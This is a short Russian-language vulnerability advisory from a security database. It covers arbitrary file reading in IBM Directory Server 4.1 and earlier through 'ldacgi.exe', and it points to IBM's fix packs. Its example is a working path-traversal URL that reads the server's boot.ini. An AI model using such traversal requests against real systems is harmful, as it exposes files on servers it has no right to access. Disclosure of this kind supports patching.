Просмотр произвольных файлов в IBM Directory Server в 'ldacgi.exe'

Дата публикации:
03.08.2004
Всего просмотров:
1092
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: IBM Directory Server 4.1 и более ранние версии

Описание: Уязвимость в IBM Directory Server в 'ldacgi.exe' позволяет удаленному пользователю просматривать файлы на целевой системе с привилегиями Web сервера.

Пример:

 
http://myserver/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252

URL производителя: http://www.ibm.com/support/docview.wss?uid=isg1IR52692

Решение:Уязвимость устранена в 3.2.2 Fix Pack 4 (http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg24006917) и 4.1 Fix Pack 3. Дополнительная информация: http://www.ibm.com/support/docview.wss?uid=swg1IR53631 и http://www.ibm.com/support/doc view.wss?uid=isg1IR52692

Ссылки: try this to read any file on IBM Directory Server <= 4.1

или введите имя

CAPTCHA